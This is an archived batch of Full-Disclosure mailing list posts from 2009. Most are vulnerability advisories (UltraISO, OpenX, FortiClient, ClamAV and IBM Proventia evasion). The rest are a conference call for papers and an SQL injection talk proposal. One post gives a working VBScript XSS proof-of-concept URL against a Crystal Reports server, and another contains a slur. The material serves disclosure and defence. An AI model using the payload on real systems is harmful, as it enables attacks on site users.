http://secunia.com/secunia_research/2008-49/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



From remove-vuln at secunia.com  Wed Apr  1 09:38:18 2009
From: remove-vuln at secunia.com (Secunia Research)
Date: Wed, 1 Apr 2009 10:38:18 +0200
Subject: [Full-disclosure] Secunia Research: UltraISO Image Name Parsing
	Format String Vulnerabilities
Message-ID: <200904010838.n318cIOT001243@ca.secunia.com>

====================================================================== 

                     Secunia Research 01/04/2009

    - UltraISO Image Name Parsing Format String Vulnerabilities -

====================================================================== 
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* UltraISO 9.3.1.2633

NOTE: Other versions may also be affected.

====================================================================== 
2) Severity 

Rating: Less critical
Impact: System compromise
Where:  Remote

====================================================================== 
3) Vendor's Description of Software 

"UltraISO is a powerful and easy-to-use utility that can extract,
create, edit, and convert CD/DVD image files. It can directly edit ISO
files, make images from CD/DVD-ROMs, or create new one from files and
folders on your computer.".

Product Link:
http://www.ezbsystems.com/ultraiso/index.html

====================================================================== 
4) Description of Vulnerability

Secunia Research has discovered two vulnerabilities in UltraISO, 
which can be exploited by malicious people to potentially compromise a
user's system.

1) A format string error when handling DAA file names can be exploited
by tricking a user into opening a file with a specially crafted name 
containing format specifiers.

2) A format string error when handling ISZ file names can be exploited
by tricking a user into opening a file with a specially crafted name 
containing format specifiers.

Successful exploitation may allow execution of arbitrary code.

====================================================================== 
5) Solution 

Update to 9.3.3.2685.

====================================================================== 
6) Time Table 

03/11/2008 - Vendor notified.
05/11/2008 - Vendor response with updated version for testing.
06/11/2008 - Vendor informed that both vulnerabilities are fixed.
31/03/2009 - Secunia notices that the latest version is not affected.
             Vendor contacted to receive confirmation that the
             reported vulnerabilities are fixed in released version.
31/03/2009 - The vendor confirms having fixed the vulnerabilities.
01/04/2009 - Public disclosure.

====================================================================== 
7) Credits 

Discovered by Dyon Balding, Secunia Research.

====================================================================== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2008-3871 for the vulnerabilities.

====================================================================== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

====================================================================== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2008-48/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================



From pschmehl_lists at tx.rr.com  Wed Apr  1 22:22:25 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 01 Apr 2009 21:22:25 +0000
Subject: [Full-disclosure] Conficker tool for end users
In-Reply-To: <165303.18966.qm@web30101.mail.mud.yahoo.com>
References: <165303.18966.qm@web30101.mail.mud.yahoo.com>
Message-ID: <871047FE53EFDF6AFA8D692A@utd65257.utdallas.edu>

--On Tuesday, March 31, 2009 18:59:55 -0500 v3nd3rs5uck <ntpeck at yahoo.com> 
wrote:

>
>
> Hi Folks,
> Since Conficker is a big thing these days I thought I'd send a link to a
> removal tool.
>
> http://www.mcafee.com/us/threat_center/conficker.html
>

And thanks to McAfee for providing a free tool that can scan an entire /16 with 
one iteration.  Trying to do hundreds of /24s is a bit of a PITA.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
Check the headers before clicking on Reply.



From dr at kyx.net  Wed Apr  1 22:29:58 2009
From: dr at kyx.net (Dragos Ruiu)
Date: Wed, 1 Apr 2009 13:29:58 -0800
Subject: [Full-disclosure] EUSecWest 2009 CFP (May 27/28,
	Deadline April 7 2009)
Message-ID: <200904011429.58694.dr@kyx.net>

Call For Papers

    The EUSecWest 2009 CFP is now open.

    Deadline is April 7th, 2009.

EUSecWest CALL FOR PAPERS

    LONDON, U.K. -- The third annual EUSecWest applied
    technical security conference - where the eminent figures
    in the international security industry will get together
    share best practices and technology - will be held in
    downtown London at the Sound Club in Leicester Square
    on May 27/28, 2009. The most significant new discoveries
    about computer network hack attacks and defenses,
    commercial security solutions, and pragmatic real world
    security experience will be presented in a series of
    informative tutorials.

    The EUSecWest meeting provides international researchers
    a relaxed, comfortable environment to learn from
    informative tutorials on key developments in security
    technology, and collaborate and socialize with their peers
    in one of the world's most most important technology
    hubs and scenic cities. The timing of the conference
    allows international travelers to travel to Berlin for
    FX's Ph-Neutral on the weekend, and Rennes the 
    following week for SSTIC.

    We would like to announce the opportunity to submit
    papers, and/or lightning talk proposals for selection by
    the EUSecWest technical review committee. This year we
    will be doing one hour talks, and some shorter talk
    sessions.

    Please make your paper proposal submissions before
    April 7th, 2009.

    Some invited papers have been confirmed, but a limited
    number of speaking slots are still available. The
    conference is responsible for travel and accommodations for
    the speaker (one speaker airfare and one room). If you 
    have a proposal for a tutorial session then please email 
    a synopsis of the material and your biography, papers 
    and, speaking background to secwest09 [at] eusecwest.com . 
    Only slides will be needed for the paper deadline, full text 
    does not have to be submitted - but will be accepted if 
    available. 

    The EUSecWest 2009 conference consists of tutorials on
    technical details about current issues, innovative
    techniques and best practices in the information security
    realm. The audiences are a multi-national mix of
    professionals involved on a daily basis with security
    work: security product vendors, programmers, security
    officers, and network administrators. We give preference
    to technical details and new education for a technical
    audience.

    The conference itself is a single track series of
    presentations in a lecture theater environment. The
    presentations offer speakers the opportunity to showcase
    on-going research and collaborate with peers while
    educating and highlighting advancements in security
    products and techniques. The focus is on innovation,
    tutorials, and education instead of product pitches. Some
    commercial content is tolerated, but it needs to be backed
    up by a technical presenter - either giving a valuable
    tutorial and best practices instruction or detailing
    significant new technology in the products.

    Paper proposals should consist of the following
    information:
     1. Presenter, and geographical location (country of
        origin/passport) and contact info (e-mail, postal
        address, phone, fax).
     2. Employer and/or affiliations.
     3. Brief biography, list of publications and papers.
     4. Any significant presentation and educational
        experience/background.
     5. Topic synopsis, Proposed paper title, and a one
        paragraph description.
     6. Reason why this material is innovative or significant
        or an important tutorial.
     7. Optionally, any samples of prepared material or
        outlines ready.
     8. Will you have full text available or only slides?
     9. Language of preference for submission.
    10. Please list any other publications or conferences
        where this material has been or will be
        published/submitted.

    Please include the plain text version of this information
    in your email as well as any file, pdf, sxw, ppt, or html
    attachments.

    Please forward the above information to secwest09 [at]
    eusecwest.com to be considered for placement on the
    speaker roster, or have your lightning talk scheduled. If
    you contact anyone else at our organization please ensure
    you also cc the submission address with your proposal or
    it may be omitted from the review process.


cheers,
--dr

-- 
World Security Pros. Cutting Edge Training, Tools, and Techniques
London, U.K. May 27/28 2009 ?http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp



From php at beccati.com  Wed Apr  1 23:33:16 2009
From: php at beccati.com (Matteo Beccati)
Date: Thu, 02 Apr 2009 00:33:16 +0200
Subject: [Full-disclosure] [OPENX-SA-2009-002] OpenX 2.4.11, 2.6.5,
	2.8.0 fix multiple vulnerabilities
Message-ID: <49D3EBAC.3010202@beccati.com>

========================================================================
OpenX security advisory                                OPENX-SA-2009-002
------------------------------------------------------------------------
Advisory ID:           OPENX-SA-2009-002
Date:                  2009-Apr-01
Security risk:         Critical
Applications affetced: OpenX
Versions affected:     <= 2.4.10, <= 2.6.4, <= 2.7.29-beta
Versions not affected: >= 2.4.11, >= 2.6.5, >= 2.8.0
========================================================================


========================================================================
Multiple vulnerabilities Discovered by Sandro Gauci
========================================================================

Description
-----------
A security review was recently being conducted on Openx 2.6.4 by Sandro
Gauci. As part of the review he reported the following vulnerabilities:

  - SQL injection in adview.php and other delivery scripts because of
   missing or improper validation of the "OAID" cookie;
  - SQL injection in tjs.php because of missing or improper validation
   of the "referer" GET parameter;
  - XSS vulnerability in sso-accounts.php because of missing or improper
   validation of the "email" GET parameter (2.4.x not affected)
  - Possible arbitrary file deletion in tjs.php via the "trackerid" GET
   parameter
  - Possible CRLF injection in various delivery files because of missing
   sanitisation of parameters (PHP 4.4.2 or 5.1.2 and follwing versions
   are not affected)
  - Possible arbitrary file deletion in various delivery scripts

Both the SQL injection vulnerabilities can be remotely exploited by
unauthenticated attackers: upgrading is strongly advised.

References
----------
https://developer.openx.org/jira/browse/OX-4867
http://resources.enablesecurity.com/advisories/openx-2.6.4-multiple.txt


========================================================================
Vulnerabilites previously repoted by Secunia
========================================================================

Description
-----------
A security review was previously conducted by Sarid Harper on behalf of
Secunia and led to the release of OpenX 2.4.10 and 2.6.4 fo fix a number
of vulnerabilities. He recently reported that OpenX 2.6.4 was still
vulnerable to two of them and they have been properly fixed now:

  - Input passed to the "userid" parameter in "www/admin/admin-user.php"
   is not properly sanitised before being returned to the user. This can
   be exploited to execute arbitrary HTML and script code in a user's
   browser session in the context of an affected site (#9)
  - Input passed to the "agencyid" parameter in
   "www/admin/agency-edit.php" is not properly sanitised before being
   returned to the user. This can be exploited to execute arbitrary
   HTML and script code in a user's browser session in the context of
   an affected site (#11)

References
----------
http://secunia.com/advisories/32197/
https://developer.openx.org/jira/browse/OX-4803
https://developer.openx.org/jira/browse/OX-4805
https://developer.openx.org/jira/browse/OX-4957


========================================================================
Multiple SQL injections and XSS vulnerabilities
========================================================================

Description
-----------
A security review was internally performed following Secunia's report.
A number of XSS vulnerabilities were found and fixed, plus several SQL
injection vulnerabilities:

  - SQL injection in userlog-index.php via the "advertiserId" parameter
  - SQL injection in channel-edit.php via the "affiliateid" parameter
  - SQL injection in banner-zone.php via the "bannerid" parameter

All require authentication to be exploited.



References
----------
https://developer.openx.org/jira/browse/OX-4826



Solution
========

We stronly advise people running affected versions to upgrade to the
most recent versions of OpenX: 2.4.11, 2.6.5 or 2.8.0.


Contact informations
====================

The security contact for OpenX can be reached at:
<security AT openx DOT org>



From rjcamarero at gmail.com  Thu Apr  2 06:52:33 2009
From: rjcamarero at gmail.com (=?ISO-8859-1?Q?Rub=E9n_Camarero?=)
Date: Thu, 2 Apr 2009 01:52:33 -0400
Subject: [Full-disclosure] h0no is back
Message-ID: <5e9568cb0904012252u382bbb29o70e976f45d534139@mail.gmail.com>

PSSHHHHHHHH what a bunch of fags.

h4cky0u can sniff IRC too!

-- 
Rub?n Camarero
CCNA, CISSP
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090402/a47064e2/attachment.html 

From sumit.siddharth at gmail.com  Thu Apr  2 07:57:24 2009
From: sumit.siddharth at gmail.com (Sumit Siddharth)
Date: Thu, 2 Apr 2009 07:57:24 +0100
Subject: [Full-disclosure] EUSecWest 2009 CFP (May 27/28,
	Deadline April 7 	2009)
In-Reply-To: <200904011429.58694.dr@kyx.net>
References: <200904011429.58694.dr@kyx.net>
Message-ID: <489d2f300904012357t44fbfaebq266ed9cd4882b573@mail.gmail.com>

HI Drago,
i didn't get a respose for my earlier mails. I would like to submit my talk
"Recent Advancements in SQL Injection Injection Exploitation Technique". I
gave this talk earlier at OWASP Appsec Au 2009, where it was very well
received. The talk has a number of demos which makes it very enjoyable.
Lemme know if you wish to include this. I am based in London.Here is the
full agenda:

Abstract

 This talk will cover different aspects of SQL Injection techniques and will
highlight why every SQL Injection is unique. Starting with the very basics
the talk will get more and more complex and will discuss exploiting SQL
injections which seem to be un-exploitable. Numerous examples will be
presented when the SQL Injection vulnerability will go undetected even by
leading scanning software costing $$. A very common vulnerability will be
shown along with a google dork which will return several "top" websites
vulnerable. Further, a new technique of exploiting SQL Injection in Oracle
to hack internal networks will be discussed. The Talk will also discuss a
number of SQL injection tools and will prove why tools can still not replace
a human pen tester.

 Outline:-

 *What is SQL Injections (yawn...)
*Type Of SQL Injections (yawn...)
*Identifying SQL injections (Identification.......time to wake up..)
*xp_cmdshell is disabled, wtf....(exploitation)
*whats xp_cmdshell alternative on mysql and oracle..(Exploitation)
*Blind SQL Injections (exploitation/identification)
*Deep Blind Injection (exploitation/identification)
*Time Delay Functions & beyond (exploitation)
* UTF7 encoding, magic quotes etc.
*Avoiding Time Delay Functions (exploitation)
*Convert Time Dealy to blind Injections (Exploitation)
* Injection in order by,group by and limit clause (Exploitation
.&.Surprise!!)
*Out Of Band Channels (Exploitation)
*Using Oracle's SQL Injection(UTL_HTTP) to own internal SQL server (
Exploitation)
*Exploiting Internal hidden networks (Exploitation)
* Can your tool detect these

 Why should you include this talk:-
 1. As more and more injection tools are available in the market, this talk
will help the audience choose the right tool for the right injection.

 2. The oracle's utl_http method to sploit internal networks is cutting edge
and no-one has ever talked about it, in the context i will talk.

 3. Its fun, everyone loves sql injection, and its not a talk, its all demo
and people will love to see the oracle sql injection returning a shell from
a ms-sql server.


 About me:-
I graduated from IIT Kanpur in 2005, and after working for NII Consulting
for about a year i have shifted to U.K, where i work for Portcullis Computer
Security. I have been a speaker at many conferences and my articles and
advisories are available on various security websites.I also own the website
www.notsosecure.com .

 /* I will probably rewrite the bio later */

 Thanks
Sid

On Wed, Apr 1, 2009 at 10:29 PM, Dragos Ruiu <dr at kyx.net> wrote:

> Call For Papers
>
>    The EUSecWest 2009 CFP is now open.
>
>    Deadline is April 7th, 2009.
>
> EUSecWest CALL FOR PAPERS
>
>    LONDON, U.K. -- The third annual EUSecWest applied
>    technical security conference - where the eminent figures
>    in the international security industry will get together
>    share best practices and technology - will be held in
>    downtown London at the Sound Club in Leicester Square
>    on May 27/28, 2009. The most significant new discoveries
>    about computer network hack attacks and defenses,
>    commercial security solutions, and pragmatic real world
>    security experience will be presented in a series of
>    informative tutorials.
>
>    The EUSecWest meeting provides international researchers
>    a relaxed, comfortable environment to learn from
>    informative tutorials on key developments in security
>    technology, and collaborate and socialize with their peers
>    in one of the world's most most important technology
>    hubs and scenic cities. The timing of the conference
>    allows international travelers to travel to Berlin for
>    FX's Ph-Neutral on the weekend, and Rennes the
>    following week for SSTIC.
>
>    We would like to announce the opportunity to submit
>    papers, and/or lightning talk proposals for selection by
>    the EUSecWest technical review committee. This year we
>    will be doing one hour talks, and some shorter talk
>    sessions.
>
>    Please make your paper proposal submissions before
>    April 7th, 2009.
>
>    Some invited papers have been confirmed, but a limited
>    number of speaking slots are still available. The
>    conference is responsible for travel and accommodations for
>    the speaker (one speaker airfare and one room). If you
>    have a proposal for a tutorial session then please email
>    a synopsis of the material and your biography, papers
>    and, speaking background to secwest09 [at] eusecwest.com .
>    Only slides will be needed for the paper deadline, full text
>    does not have to be submitted - but will be accepted if
>    available.
>
>    The EUSecWest 2009 conference consists of tutorials on
>    technical details about current issues, innovative
>    techniques and best practices in the information security
>    realm. The audiences are a multi-national mix of
>    professionals involved on a daily basis with security
>    work: security product vendors, programmers, security
>    officers, and network administrators. We give preference
>    to technical details and new education for a technical
>    audience.
>
>    The conference itself is a single track series of
>    presentations in a lecture theater environment. The
>    presentations offer speakers the opportunity to showcase
>    on-going research and collaborate with peers while
>    educating and highlighting advancements in security
>    products and techniques. The focus is on innovation,
>    tutorials, and education instead of product pitches. Some
>    commercial content is tolerated, but it needs to be backed
>    up by a technical presenter - either giving a valuable
>    tutorial and best practices instruction or detailing
>    significant new technology in the products.
>
>    Paper proposals should consist of the following
>    information:
>     1. Presenter, and geographical location (country of
>        origin/passport) and contact info (e-mail, postal
>        address, phone, fax).
>     2. Employer and/or affiliations.
>     3. Brief biography, list of publications and papers.
>     4. Any significant presentation and educational
>        experience/background.
>     5. Topic synopsis, Proposed paper title, and a one
>        paragraph description.
>     6. Reason why this material is innovative or significant
>        or an important tutorial.
>     7. Optionally, any samples of prepared material or
>        outlines ready.
>     8. Will you have full text available or only slides?
>     9. Language of preference for submission.
>    10. Please list any other publications or conferences
>        where this material has been or will be
>        published/submitted.
>
>    Please include the plain text version of this information
>    in your email as well as any file, pdf, sxw, ppt, or html
>    attachments.
>
>    Please forward the above information to secwest09 [at]
>    eusecwest.com to be considered for placement on the
>    speaker roster, or have your lightning talk scheduled. If
>    you contact anyone else at our organization please ensure
>    you also cc the submission address with your proposal or
>    it may be omitted from the review process.
>
>
> cheers,
> --dr
>
> --
> World Security Pros. Cutting Edge Training, Tools, and Techniques
> London, U.K. May 27/28 2009  http://eusecwest.com
> pgpkey http://dragos.com/ kyxpgp
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Sumit Siddharth
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090402/b5011ca1/attachment.html 

From bugsnothugs at gmail.com  Thu Apr  2 10:54:54 2009
From: bugsnothugs at gmail.com (Bugs NotHugs)
Date: Thu, 2 Apr 2009 03:54:54 -0600
Subject: [Full-disclosure] SAP BusinessObjects Crystal Reports
	viewreport.asp Multiple Parameter XSS
Message-ID: <63ac005e0904020254i226d84a4w8723e0d3b83354bb@mail.gmail.com>

- SAP BusinessObjects Crystal Reports viewreport.asp Multiple Parameter XSS

- Description

Cross-site scripting; vbscript rather than javascript. Subsequent page
will contain pop up reading "fsck_cissp". ID, PROMPTEX-SESSION_ID,
PROMPTEX-TO_DATE, PROMPTEX-FROM_DATE, PROMPTEX-YEAR_QTR1,
PROMPTEX-YEAR_QTR2, PROMPTEX-YEAR_QTR3, PROMPTEX-YEAR_QTR4,
PROMPTEX-YEAR_QTR5, PROMPTEX-YEAR_QTR6, PROMPTEX-YEAR_QTR7,
PROMPTEX-YEAR_QTR8, and PROMPTEX-QT parameters affected.

The following is the response:

        <SCRIPT LANGUAGE="VBScript">
        <!--

        Sub window_onLoad()
                Page_Initialize()
        End Sub

        Sub Page_Initialize
            On Error Resume Next
            Dim webBroker
            Set webBroker = CreateObject("CrystalReports11.WebReportBroker.1")
            if err.number <> 0 then
                window.alert "The Crystal ActiveX Viewer is unable to
create it's resource objects."
                CRViewer.ReportName =
"HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
        window.alert "fsck_cissp"
            else
                Dim webSource0
                Set webSource0 =
CreateObject("CrystalReports11.WebReportSource.1")
                        webSource0.ReportSource = webBroker
                        webSource0.URL =
"HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777
<HTTPS://66.240.213.81/some/path/ceviewer/viewrpt.cwr?APSTOKEN=&ID=7777>
"
        window.alert "fsck_cissp"
                        webSource0.PromptOnRefresh = True


                        CRViewer.ReportSource = webSource0
            end if
            CRViewer.ViewReport
        End Sub

        -->
        </SCRIPT>

- Product

SAP BusinessObjects, Crystal Reports, unknown

- PoC

https://66.240.213.81/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect

- Solution

None

- Timeline

2008-01-23: Vulnerability discovered
2008-02-15: Vendor contact methods unacceptable (paying customers only)

--
BugsNotHugs
Shared Vulnerability Disclosure Account



From dh at layereddefense.com  Thu Apr  2 03:28:40 2009
From: dh at layereddefense.com (Deral Heiland)
Date: Wed, 01 Apr 2009 22:28:40 -0400
Subject: [Full-disclosure] Layered Defense Research Advisory: Format String
 Vulnerability: FortiClient Version 3
Message-ID: <20090402023546.0910615C@lists.grok.org.uk>


Layered Defense Research Advisory 02 April 2009
==================================================
1) Affected Product
FortiClient Version 3.0.614
Earlier versions may also be vulnerable
==================================================
2) Severity Rating: Low
==================================================
3) Description of Vulnerability:
A local format string vulnerability was discovered within FortiClient 
version 3.0.614 VPN .The vulnerability is due to improper processing 
of format strings specifiers within the VPN connection name. When 
special crafted format strings are entered as the VPN connection name 
and the connection is initiated the format string vulnerability is 
triggered. Making it possible to read and write arbitrary memory at 
System level.
==================================================
4) Solution : Upgrade to FortiClient v3.0 MR7 Patch Release 6
==================================================
5) Time Table:
02/02/2009 Reported Vulnerability to Vendor.
02/03/2009 Vendor acknowledged the vulnerability
03/13/2009 Vendor published fix
==================================================
6) Credits Discovered by Deral Heiland, www.LayeredDefense.com
==================================================
7) Reference
https://support.fortinet.com/Login/UserLogin.aspx
==================================================
8) About Layered Defense Layered Defense, Is a group of security 
professionals that work together on ethical Research, Testing and 
Training within the information security arena. http://www.layereddefense.com
================================================== 



From dennis at conus.info  Thu Apr  2 13:31:30 2009
From: dennis at conus.info (Dennis Yurichev)
Date: Thu, 02 Apr 2009 15:31:30 +0300
Subject: [Full-disclosure] IBM DB2 two PoCs
Message-ID: <49D4B022.3090804@conus.info>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi.

Two PoCs for DoS vulnerabilities fixed in IBM DB2 9.5 FP3a:
IZ37697: SECURITY: MALICIOUS CONNECT DATA STREAM CAN CAUSE DENIAL OF
SERVICE.
...and
IZ39653: SECURITY: MALICOUS DATA STREAM CAN CAUSE THE DB2 SERVER TO TRAP.
... can be downloaded there:
http://blogs.conus.info/node/17


- --
My PGP public key: http://yurichev.com/dennis.yurichev.asc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknUsCIACgkQ1YPmFmJG++OMswCfYQ7FVcFY4lT5aQpDz6rOBSf1
jP0Anjaifm5gqQhMg7l8P59VAANFlgQX
=niZA
-----END PGP SIGNATURE-----



From Thierry at Zoller.lu  Thu Apr  2 15:27:54 2009
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 2 Apr 2009 16:27:54 +0200
Subject: [Full-disclosure] [TZO-05-2009] Clamav 0.94 and below - Evasion
	/bypass
Message-ID: <1954437740.20090402162754@Zoller.lu>

______________________________________________________________________

  From the low-hanging-fruit-department - Generic ClamAV evasion 
______________________________________________________________________

Release mode: Coordinated but limited disclosure.
Ref         : TZO-062009- ClamAV Evasion
WWW         : http://blog.zoller.lu/2009/04/clamav-094-and-below-evasion-and-bypass.html
Vendor      : http://www.clamav.net &
              http://www.sourcefire.com/products/clamav
Security notification reaction rating : Good.
Disclosure Policy : 
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products : 
- ClamAV below 0.95
  Includes MACOSX server,IBM Secure E-mail Express Solution for System
  and a lots of mail appliances.
  http://www.clamav.net/about/who-use-clamav/

About this advisory
-------------------
I used to not report bugs publicly where a a vendor - has not reacted 
to my notifications - silently patched. I also did not publish
low hanging fruits as they make you look silly in the eyes of your
peers.

Over the past years I had the chance to audit and test a lot of critical 
infrastructures that, amongst other things relied on security products 
(and on security notifications from vendors) and have witnessed various 
ways of setting up your defenses that make some bugs critical that 
you'd consider low at first glance, I came to the conclusion that most
bugs deserve disclosure. 

Please see "Common misconceptions" for more information.

I. Background
~~~~~~~~~~~~~
Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, 
designed especially for e-mail scanning on mail gateways. It provides 
a number of utilities including a flexible and scalable multi-threaded
daemon, a command line scanner and advanced tool for automatic 
database updates. The core of the package is an anti-virus engine 
available in a form of shared library. 

II. Description
~~~~~~~~~~~~~~~
The parsing engine can be bypassed by manipulating RAR archive in 
a "certain way" that the Clamav engine cannot extract the content but
the end user is able to. Details are currently witheld (thanks to IBM).

III. Impact
~~~~~~~~~~~
The bug results in denying the engine the possibility to inspect
code within the RAR archive. While the impact might be low client-
side (as code is inspected upon extraction by the user) the impact
for gateways or AV infrastructure where the archive is not extracted 
is considerable. There is no inspection of the content at all, prior 
disclosure therefore referred to this class of bugs as Denial of service 
(you deny the service of the scan engine for that file) however I 
choose to stick the terms of evasion/bypass, being the primary impact 
of these types of bugs.

PS. I am aware that there are hundreds of ways to bypass, that however
doesn't make it less of a problem. I am waiting for the day where the 
first worm uses these techniques to stay undetected over a longer 
period of time, as depending on the evasion a kernel update (engine 
update) is necessary and sig updates do not suffice. Resulting in 
longer window of exposure - at least for GW solutions. *Must make 
confiker reference here*


IV. Common misconceptions about this "bug class"
--------------------------------------------------
- This has the same effect as adding a password to a ZIP file

The scanner denotes files that are passworded, an example is an E-mail
GW scanner that adds "Attachment not scanned" to the subject line or
otherwise indicates that the file was not scanned. This is not the case
with bypasses, in most cases the engine has not inspected the content
at all or has inspected it in a different way.
Additionally passworded archive files are easily filterable by a content
policy, allowing or denying them.

- This is only an issue with gateway products

Every environment where the archive is not actively extracted by 
the end-user is affected. For example, fileservers, databases
etc. pp. Over the years I saw the strangest environments that 
were affected by this type of "bug". My position is that customers
deserve better security than this.

- Behavioral analysis will catch this ?
No, the content is unreadable to the AV engine as such no inspection
whatsoever is possible.

- Evasions are the Cross Site scripting of File formats bugs
Yes.


IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~~

IBM was sent two POC files, an explanation and the disclosure terms 
(http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html)

09/03/2009 : Send proof of concept, description the terms under which 
             I cooperate and the planned disclosure date (23/03/2009)
                         
13/03/2009 : Clamav responds that the bug is reproducible and will be
             fixed in 0.95 to be released the 23/03/2009
             
             (IBM take note, it's that easy.)

23/05/2009 : Asked clamav if the release was made and if credit was 
             given

23/05/2009 : Clamav responds that the release was made, and that the
             credit was given in the changelog. (Tzo note: A post will 
             be probably be made at http://www.clamav.net/category/security/
                                 
02/01/2009 : Release of this limited detail advisory

Final comments :
I would like to thank Tomasz Kojm (clamav) for the professional 
reaction and AV-Test GMBH for their support.







From Thierry at Zoller.lu  Thu Apr  2 16:10:48 2009
From: Thierry at Zoller.lu (Thierry Zoller)
Date: Thu, 2 Apr 2009 17:10:48 +0200
Subject: [Full-disclosure] [TZO-06-2009] IBM Proventia - Generic bypass
	(Limited disclosure - see details)
Message-ID: <954736073.20090402171048@Zoller.lu>

______________________________________________________________________

  From the low-hanging-fruit-department - IBM /ISS Proventia evasion 
______________________________________________________________________

Release mode: Forced disclosure, no answer from vendor.
Ref         : TZO-06-2009-IBM Proventia
WWW         : http://blog.zoller.lu/2009/04/ibm-proventia-evasion-limited-details.html
Vendor      : http://www.ibm.com
Security notification reaction rating : Catastrophic (see Timeline)

Disclosure Policy : 
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

Affected products : IBM Proventia engine (minimum 4.9.0.0.44 20081231 
Official Release) other products using the engine are likely to be 
affected too. As IBM has not cooperated in any way and I have better 
things to do than to test IBM products for free I cannot state all 
affected products, if you are an IBM/ISS customer please call IBM 
support and request more details.


About this advisory
-------------------
I used to not report bugs publicly where a a vendor - has not reacted 
to my notifications - silently patched. I also did not publish
low hanging fruits as they make you look silly in the eyes of your
 peers.

Over the past years I had the chace to audit and test a lot of critical 
infrastructures that (also) relied on products (and about security 
notification from vendors) and have witnessed various ways of setting 
up your defenses that make some bugs critical that you'd consider low, 
I came to the conclusion that most bugs deserve disclosure. 

Please see "Common misconceptions" for more information.

I. Background
~~~~~~~~~~~~~
IBM Internet Security Systems (ISS) offers a comprehensive portfolio 
of IT security products and services for organizations of all sizes. 

IBM Proventia Network Mail Security System and IBM Proventia 
Network Mail Security System Virtual Appliance provide spam 
control and preemptive protection for your messaging 
infrastructure.

Proventia Network Mail is the only email security solution equipped 
with the IBM Intrusion Prevention System (IPS) engine and a behavioral 
genotype (SIC!) anti-virus technology, along with remote malware 
detection and Sophos signature-based anti-virus. 

II. Description
~~~~~~~~~~~~~~~
The parsing engine can be bypassed by manipulating RAR archive in 
a "certain way" that the IBM engine cannot extract the content but
the end user is able to. Details are currently witheld (see below).

A professional reaction to a vulnerability notification is a way 
to measure the maturity of a vendor in terms of security. IBM is 
given a grace period of two (2) weeks to reply to my notification.
Failure to do so will resulting in POC being released in two (2) 
weeks. If IBM is not aware of how to deal with security notifications
I recommend them to read my security notification response draft on 
how to do so at  
http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html

As this bug has not been reproduced by the vendor, this advisory 
relies on the assumption that my tests were conclusive. 

I would like to thank AV-Tests GMBH for the cooperation.

III. Impact
~~~~~~~~~~~
The bug results in denying the engine the possibility to inspect
code within the RAR archive. While the impact might be low client-
side (as code is inspected upon extraction by the user) the impact
for gateways or AV infrastructure where the archive is not extracted 
is considerable. There is no inspection of the content at all, prior 
disclosure therefore refered to this class of bugs as Denial of service 
(you deny the service of the scan engine for that file) however I 
choose to stick the terms of evasion/bypass, being the primary impact 
of these types of bugs.

PS. I am aware that there are hundreds of ways to bypass, that however
doesn't make it less of a problem. I am waiting for the day where the 
first worm uses these techniques to stay undetected over a longer 
period of time, as depending on the evasion a kernel update (engine 
update) is necessary and sig updates do not suffice. Resulting in 
longer window of exposure - at least for GW solutions. *Must make 
confiker reference here*


IV. Common misconceptions about this "bug class"
--------------------------------------------------
- This has the same effect as adding a password to a ZIP file

The scanner denotes files that are passworded, an example is an E-mail
GW scanner that adds "Attachement not scanned" to the subject line or
otherwise indicates that the file was not scanned. This is not the case
with bypasses, in most cases the engine has not inspected the content
at all or has inspected it in a different way.
Additionaly passworded archive files are easily filterable by a content
policy, allowing or denying them.

- This is only an issue with gateway products

Every environment where the archive is not actively extracted by 
the end-user is affected. For example, fileservers, databases
etc. pp. Over the years I saw the strangest environments that 
were affected by this type of "bug". My position is that customers
deserve better security than this.

- If this is exploited by a worm it will be fixed within minutes.
